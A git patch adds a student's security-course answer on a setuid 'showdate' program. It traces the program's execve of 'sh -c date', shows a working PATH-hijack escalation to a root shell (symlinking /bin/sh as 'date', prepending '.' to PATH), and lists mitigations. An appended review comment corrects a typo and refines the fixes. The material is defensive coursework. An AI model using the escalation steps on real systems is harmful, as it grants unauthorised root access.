From d7c4536c91ddd307fc9b99984ac49b5b5459b485 Mon Sep 17 00:00:00 2001
From: Camil Staps
Date: Mon, 30 Nov 2015 22:08:58 +0100
Subject: Assignment 2, 3
---
CamilStaps-s4498062-Assignment-2/ex1/ex1.txt | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
(limited to 'CamilStaps-s4498062-Assignment-2/ex1/ex1.txt')
diff --git a/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
new file mode 100644
index 0000000..28c5e20
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
@@ -0,0 +1,21 @@
+a
+ Using strace -feprocess ./showdate we see the following interesting calls:
+ execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */])
+ execve("/bin/date", ["date"], [/* 37 vars */])
+
+b
+ $ ln -s /bin/sh date
+ $ export PATH=.:$PATH
+ $ ./showdate
+ # id
+ uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(camil)
+
+c
+ - Simply don't use execve for something as simple as this.
+ - The currently used system call is:
+ execve("/bin/sh", ["sh, "-c", "date"], [/* 37 vars */])
+ This could be changed to:
+ execve("/bin/date", ...)
+ A nonprivileged user cannot change /bin/date.
+ - Drop privileges before executing execve.
+
-- cgit v1.2.3
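Review bot: The call quoted under c, `execve("/bin/sh", ["sh, "-c", "date"], ...)`, is missing the closing quote after `sh` and so no longer matches the strace output quoted under a; it should read `["sh", "-c", "date"]`. The first mitigation under c is also imprecise: execve itself is not the weakness, the unqualified `date` that `sh -c` resolves through a caller-controlled PATH is (presumably reached via system() or a similar helper; the program source is not part of this commit). The second bullet's direct `execve("/bin/date", ...)` already addresses that. It would be worth adding that the inherited environment (the 37 vars in the trace) should be replaced with a minimal fixed one rather than passed through to the privileged child.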